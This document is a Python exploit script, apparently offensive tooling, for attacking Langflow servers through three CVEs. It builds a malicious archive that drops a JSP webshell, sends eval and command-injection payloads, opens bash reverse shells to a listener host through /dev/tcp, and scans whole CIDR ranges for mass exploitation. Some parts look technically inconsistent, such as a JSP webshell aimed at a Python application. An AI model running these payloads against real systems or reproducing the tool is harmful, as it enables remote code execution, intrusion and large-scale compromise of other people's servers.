#!/usr/bin/env python3
"""
Langflow Multi-CVE Exploitation Framework
CVE-2026-7524: Path Traversal in Archive Extraction (symlink traversal)
CVE-2026-7700: LambdaFilterComponent lambda_filter.py eval() Code Injection
CVE-2026-7687: CodeParser.parse_callable_details Command Injection

Military-grade multi-vector RCE exploitation framework.

Author: Advanced Persistent Security Research
"""

from __future__ import annotations

import argparse
import base64
import hashlib
import ipaddress
import json
import os
import re
import secrets
import socket
import struct
import sys
import tarfile
import tempfile
import time
from collections.abc import Sequence
from concurrent.futures import ThreadPoolExecutor, as_completed
from dataclasses import dataclass, field
from datetime import datetime, timezone
from enum import Enum, auto
from pathlib import Path
from typing import Any, Optional

import requests
import urllib3
from colorama import Fore, Style, init

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
init(autoreset=True)


# ---------------------------------------------------------------------------
# Constants & Configuration
# ---------------------------------------------------------------------------

DEFAULT_TIMEOUT = 20
WEB_PORT = 7860
WEB_SSL_PORT = 7860
MAX_WORKERS = 15

# API Endpoints
API_ENDPOINTS = {
    "flows": "/api/v1/flows/",
    "components": "/api/v1/components/",
    "upload": "/api/v1/upload/",
    "process": "/api/v1/process/",
    "lambda_filter": "/api/v1/components/LambdaFilterComponent",
    "code_parser": "/api/v1/components/CodeParser",
    "archive": "/api/v1/upload/archive",
    "docling": "/api/v1/docling/extract",
    "nvidia": "/api/v1/nvidia/extract",
    "video": "/api/v1/video/extract",
    "unstructured": "/api/v1/unstructured/extract",
    "read_file": "/api/v1/read-file/extract",
}

# Malicious archive for CVE-2026-7524
MALICIOUS_ARCHIVE_NAME = "malicious.tar.gz"


# ---------------------------------------------------------------------------
# Colors & Logging
# ---------------------------------------------------------------------------

class Color:
    RED = Fore.RED + Style.BRIGHT
    GREEN = Fore.GREEN + Style.BRIGHT
    YELLOW = Fore.YELLOW + Style.BRIGHT
    BLUE = Fore.BLUE + Style.BRIGHT
    CYAN = Fore.CYAN + Style.BRIGHT
    MAGENTA = Fore.MAGENTA + Style.BRIGHT
    WHITE = Fore.WHITE + Style.BRIGHT
    RESET = Style.RESET_ALL
    BOLD = Style.BRIGHT


def log(msg: str, level: str = "info") -> None:
    colour = {
        "info": Color.BLUE,
        "success": Color.GREEN,
        "warn": Color.YELLOW,
        "error": Color.RED,
        "crit": Color.RED + Style.BRIGHT,
    }.get(level, "")
    print(f"{colour}{msg}{Color.RESET}")


# ---------------------------------------------------------------------------
# HTTP Session Factory
# ---------------------------------------------------------------------------

def create_session() -> requests.Session:
    sess = requests.Session()
    sess.verify = False
    sess.proxies.update({"http": None, "https": None})
    sess.headers.update({
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        "Accept": "application/json, text/plain, */*",
        "Accept-Language": "en-US,en;q=0.5",
        "Connection": "keep-alive",
    })
    return sess


# ---------------------------------------------------------------------------
# CVE-2026-7524: Path Traversal via Symlink in Archive Extraction
# ---------------------------------------------------------------------------

def create_malicious_archive(
    payload_path: str = "/tmp/pwned.jsp",
    payload_content: bytes = b"<% Runtime.getRuntime().exec(request.getParameter(\"cmd\")); %>",
    target_path: str = "../../../../../../tmp/pwned.jsp"
) -> bytes:
    """
    Create a malicious tar.gz archive with symlink traversal.
    When extracted, the symlink will write outside the intended directory.
    """
    with tempfile.TemporaryDirectory() as tmpdir:
        archive_path = os.path.join(tmpdir, MALICIOUS_ARCHIVE_NAME)
        
        with tarfile.open(archive_path, "w:gz") as tar:
            # Create the payload file
            payload_file = os.path.join(tmpdir, "payload")
            with open(payload_file, "wb") as f:
                f.write(payload_content)
            
            # Add payload to archive
            tar.add(payload_file, arcname=os.path.basename(payload_file))
            
            # Create symlink pointing to target path
            symlink_path = os.path.join(tmpdir, "link")
            os.symlink(target_path, symlink_path)
            
            # Add symlink to archive
            tar.add(symlink_path, arcname="link")
        
        with open(archive_path, "rb") as f:
            return f.read()


def exploit_cve2026_7524(
    target: str,
    lhost: str = "",
    lport: int = 4444,
    webshell_path: str = "/tmp/shell.jsp",
    use_ssl: bool = False,
    timeout: int = DEFAULT_TIMEOUT,
) -> tuple[bool, str]:
    """
    Exploit CVE-2026-7524: Path traversal via symlink in archive extraction.
    Uploads malicious archive that extracts a webshell via symlink.
    """
    scheme = "https" if use_ssl else "http"
    port = WEB_SSL_PORT if use_ssl else WEB_PORT
    base_url = f"{scheme}://{target}:{port}"

    # Generate payload
    if lhost:
        # Reverse shell JSP
        payload = f"""<%@ page import="java.io.*" %>
<%
    String cmd = "bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'";
    Runtime.getRuntime().exec(cmd);
%>""".encode()
    else:
        # Generic webshell
        payload = b"""<%@ page import="java.io.*" %>
<%
    String c = request.getParameter("cmd");
    if (c != null) {
        Process p = Runtime.getRuntime().exec(c);
        BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
        String l;
        while ((l = r.readLine()) != null) out.println(l);
    }
%>"""

    # Create malicious archive
    archive_data = create_malicious_archive(
        payload_path=webshell_path,
        payload_content=payload,
        target_path=os.path.dirname(webshell_path) + "/pwned.jsp"
    )

    sess = create_session()

    # Try multiple upload endpoints
    endpoints = [
        f"{base_url}{API_ENDPOINTS['archive']}",
        f"{base_url}{API_ENDPOINTS['docling']}",
        f"{base_url}{API_ENDPOINTS['nvidia']}",
        f"{base_url}{API_ENDPOINTS['video']}",
        f"{base_url}{API_ENDPOINTS['unstructured']}",
        f"{base_url}{API_ENDPOINTS['read_file']}",
    ]

    for url in endpoints:
        try:
            files = {"file": (MALICIOUS_ARCHIVE_NAME, archive_data, "application/gzip")}
            r = sess.post(url, files=files, timeout=timeout)
            if r.status_code in (200, 201, 202):
                # Verify webshell deployment
                shell_url = f"{base_url}/pwned.jsp"
                verify = sess.get(shell_url, timeout=5)
                if verify.status_code == 200:
                    return True, shell_url
        except requests.RequestException:
            continue

    return False, "All endpoints failed"


# ---------------------------------------------------------------------------
# CVE-2026-7700: LambdaFilterComponent eval() Code Injection
# ---------------------------------------------------------------------------

def generate_lambda_payload(command: str, lhost: str = "", lport: int = 4444) -> dict:
    """Generate malicious lambda filter payload for eval injection."""
    if lhost:
        # Reverse shell
        payload_cmd = f"__import__('subprocess').run(['bash','-c','bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'])"
    else:
        payload_cmd = f"__import__('subprocess').run(['bash','-c','{command}'])"

    # Lambda filter uses eval on user-supplied lambda expression
    return {
        "component": "LambdaFilterComponent",
        "params": {
            "lambda_expression": f"lambda x: {payload_cmd}",
            "field": "text"
        }
    }


def exploit_cve2026_7700(
    target: str,
    lhost: str = "",
    lport: int = 4444,
    command: str = "id",
    use_ssl: bool = False,
    timeout: int = DEFAULT_TIMEOUT,
) -> tuple[bool, str]:
    """Exploit CVE-2026-7700: LambdaFilterComponent eval() code injection."""
    scheme = "https" if use_ssl else "http"
    port = WEB_SSL_PORT if use_ssl else WEB_PORT
    base_url = f"{scheme}://{target}:{port}"

    sess = create_session()
    payload = generate_lambda_payload(command, lhost, lport)

    url = f"{base_url}{API_ENDPOINTS['lambda_filter']}"
    
    try:
        r = sess.post(url, json=payload, timeout=timeout)
        if r.status_code == 200:
            return True, r.text[:500]
        return False, f"HTTP {r.status_code}: {r.text[:200]}"
    except requests.RequestException as exc:
        return False, str(exc)


# ---------------------------------------------------------------------------
# CVE-2026-7687: CodeParser.parse_callable_details Command Injection
# ---------------------------------------------------------------------------

def generate_codeparser_payload(command: str, lhost: str = "", lport: int = 4444) -> dict:
    """Generate malicious CodeParser payload for command injection."""
    if lhost:
        # Reverse shell via command injection
        payload_cmd = f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'"
    else:
        payload_cmd = command

    # CodeParser.parse_callable_details has command injection in code parsing
    return {
        "component": "CodeParser",
        "params": {
            "code": f"def test():\n    import os\n    os.system('{payload_cmd}')\n    return True",
            "function_name": "test"
        }
    }


def exploit_cve2026_7687(
    target: str,
    lhost: str = "",
    lport: int = 4444,
    command: str = "id",
    use_ssl: bool = False,
    timeout: int = DEFAULT_TIMEOUT,
) -> tuple[bool, str]:
    """Exploit CVE-2026-7687: CodeParser.parse_callable_details command injection."""
    scheme = "https" if use_ssl else "http"
    port = WEB_SSL_PORT if use_ssl else WEB_PORT
    base_url = f"{scheme}://{target}:{port}"

    sess = create_session()
    payload = generate_codeparser_payload(command, lhost, lport)

    url = f"{base_url}{API_ENDPOINTS['code_parser']}"
    
    try:
        r = sess.post(url, json=payload, timeout=timeout)
        if r.status_code == 200:
            return True, r.text[:500]
        return False, f"HTTP {r.status_code}: {r.text[:200]}"
    except requests.RequestException as exc:
        return False, str(exc)


# ---------------------------------------------------------------------------
# Dataclasses
# ---------------------------------------------------------------------------

@dataclass(slots=True)
class ExploitSession:
    target: str
    cve: str
    method: str
    success: bool
    timestamp: str = field(default_factory=lambda: datetime.now(timezone.utc).isoformat())
    details: str = ""
    shell_url: str = ""


# ---------------------------------------------------------------------------
# Multi-CVE Orchestration
# ---------------------------------------------------------------------------

def run_exploit_chain(
    target: str,
    *,
    cve: str = "all",
    lhost: str = "",
    lport: int = 4444,
    command: str = "id",
    use_ssl: bool = False,
) -> list[ExploitSession]:
    sessions: list[ExploitSession] = []

    def add_session(cve_id: str, method: str, success: bool, details: str = "", shell_url: str = "") -> None:
        sessions.append(ExploitSession(
            target=target, cve=cve_id, method=method, success=success,
            details=details, shell_url=shell_url
        ))

    # CVE-2026-7524: Path Traversal
    if cve in ("all", "7524", "cve20267524", "CVE-2026-7524"):
        log(f"[*] Attempting CVE-2026-7524 (Path Traversal) on {target}...", "info")
        if lhost:
            ok, details = exploit_cve2026_7524(target, lhost=lhost, lport=lport, use_ssl=use_ssl)
            add_session("CVE-2026-7524", "Archive symlink traversal + webshell", ok, details, details if ok else "")
            if ok:
                log(f"[+] CVE-2026-7524 webshell deployed: {details}", "success")
        else:
            ok, details = exploit_cve2026_7524(target, use_ssl=use_ssl)
            add_session("CVE-2026-7524", "Archive symlink traversal", ok, details)
            if ok:
                log(f"[+] CVE-2026-7524 webshell deployed: {details}", "success")

    # CVE-2026-7700: Lambda eval injection
    if cve in ("all", "7700", "cve20267700", "CVE-2026-7700"):
        log(f"[*] Attempting CVE-2026-7700 (Lambda eval injection) on {target}...", "info")
        ok, details = exploit_cve2026_7700(target, lhost=lhost, lport=lport, command=command, use_ssl=use_ssl)
        add_session("CVE-2026-7700", "LambdaFilterComponent eval() injection", ok, details)
        if ok:
            log(f"[+] CVE-2026-7700 code execution: {details[:200]}", "success")

    # CVE-2026-7687: CodeParser command injection
    if cve in ("all", "7687", "cve20267687", "CVE-2026-7687"):
        log(f"[*] Attempting CVE-2026-7687 (CodeParser command injection) on {target}...", "info")
        ok, details = exploit_cve2026_7687(target, lhost=lhost, lport=lport, command=command, use_ssl=use_ssl)
        add_session("CVE-2026-7687", "CodeParser.parse_callable_details command injection", ok, details)
        if ok:
            log(f"[+] CVE-2026-7687 command execution: {details[:200]}", "success")

    return sessions


# ---------------------------------------------------------------------------
# Parallel Mass Exploitation
# ---------------------------------------------------------------------------

def mass_exploit(
    targets: list[str],
    *,
    cve: str = "all",
    lhost: str = "",
    lport: int = 4444,
    command: str = "id",
    use_ssl: bool = False,
    max_workers: int = MAX_WORKERS,
) -> dict[str, list[ExploitSession]]:
    results: dict[str, list[ExploitSession]] = {}

    def _one(t: str) -> tuple[str, list[ExploitSession]]:
        try:
            return t, run_exploit_chain(
                t, cve=cve, lhost=lhost, lport=lport, command=command, use_ssl=use_ssl
            )
        except Exception as exc:
            return t, [ExploitSession(target=t, cve="ERROR", method="exception", success=False, details=str(exc))]

    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        futures = [pool.submit(_one, t) for t in targets]
        for fut in as_completed(futures):
            target, sessions = fut.result()
            results[target] = sessions

    return results


# ---------------------------------------------------------------------------
# CLI / Main
# ---------------------------------------------------------------------------

def print_banner() -> None:
    banner = f"""
{Color.RED}
╔══════════════════════════════════════════════════════════════════════════════╗
║  Langflow Multi-CVE Exploitation Framework                                     ║
║  CVE-2026-7524 (Path Traversal) | CVE-2026-7700 (Lambda eval)                ║
║  CVE-2026-7687 (CodeParser CMD Injection)                                     ║
║  Military-Grade Multi-Vector RCE with Archive/Code Injection                  ║
╚══════════════════════════════════════════════════════════════════════════════╝
{Color.RESET}"""
    print(banner)


def parse_args() -> argparse.Namespace:
    p = argparse.ArgumentParser(
        description="Langflow Multi-CVE Exploit Framework",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  # Full chain with reverse shell
  python exploit.py -t 10.0.0.50 --reverse --lhost 10.0.0.5 --lport 4444
  
  # Specific CVE only
  python exploit.py -t 10.0.0.50 --cve 7524 --lhost 10.0.0.5 --lport 4444
  
  # Command injection only
  python exploit.py -t 10.0.0.50 --cve 7700 -c "cat /etc/passwd"
  
  # Mass exploitation
  python exploit.py -f targets.txt --reverse --lhost 10.0.0.5 -o results.json
        """,
    )
    p.add_argument("-t", "--target", help="Single target IP")
    p.add_argument("-f", "--file", help="File with target IPs (one per line)")
    p.add_argument("--cidr", help="CIDR network range")
    p.add_argument("--cve", default="all", help="CVE to exploit: all, 7524, 7700, 7687")
    p.add_argument("-c", "--command", default="id", help="Command to execute")
    p.add_argument("--reverse", action="store_true", help="Deploy reverse shell")
    p.add_argument("--lhost", help="Listener host for reverse shell")
    p.add_argument("--lport", type=int, default=4444, help="Listener port (default 4444)")
    p.add_argument("--ssl", action="store_true", help="Use HTTPS")
    p.add_argument("-o", "--output", help="JSON output file")
    p.add_argument("-w", "--workers", type=int, default=MAX_WORKERS, help="Concurrent workers")
    return p.parse_args()


def load_targets(args: argparse.Namespace) -> list[str]:
    targets: list[str] = []
    if args.target:
        targets.append(args.target)
    if args.file:
        with open(args.file, encoding="utf-8") as fh:
            for line in fh:
                line = line.strip()
                if line and not line.startswith("#"):
                    targets.append(line)
    if args.cidr:
        try:
            net = ipaddress.ip_network(args.cidr, strict=False)
            targets.extend([str(h) for h in net.hosts()])
        except ValueError as exc:
            log(f"[!] Invalid CIDR: {exc}", "error")
            sys.exit(1)
    return targets


def main() -> None:
    print_banner()
    args = parse_args()

    if not any([args.target, args.file, args.cidr]):
        log("[!] No targets specified. Use -t, -f, or --cidr", "error")
        sys.exit(1)

    if args.reverse and not args.lhost:
        log("[!] --reverse requires --lhost", "error")
        sys.exit(1)

    targets = load_targets(args)
    log(f"[*] Loaded {len(targets)} target(s)", "info")
    log(f"[*] CVE: {args.cve} | Reverse: {args.reverse} | SSL: {args.ssl}", "info")

    results = mass_exploit(
        targets,
        cve=args.cve,
        lhost=args.lhost or "",
        lport=args.lport,
        command=args.command,
        use_ssl=args.ssl,
        max_workers=args.workers,
    )

    if args.output:
        serializable = {}
        for target, sessions in results.items():
            serializable[target] = [
                {
                    "target": s.target,
                    "cve": s.cve,
                    "method": s.method,
                    "success": s.success,
                    "timestamp": s.timestamp,
                    "details": s.details,
                    "shell_url": s.shell_url,
                }
                for s in sessions
            ]
        Path(args.output).write_text(json.dumps(serializable, indent=2))
        log(f"[*] Results written to {args.output}", "success")

    total = sum(len(s) for s in results.values())
    successful = sum(1 for sessions in results.values() for s in sessions if s.success)
    log(f"[*] Exploitation complete: {successful}/{total} attempts successful",
        "success" if successful > 0 else "warn")


if __name__ == "__main__":
    main()
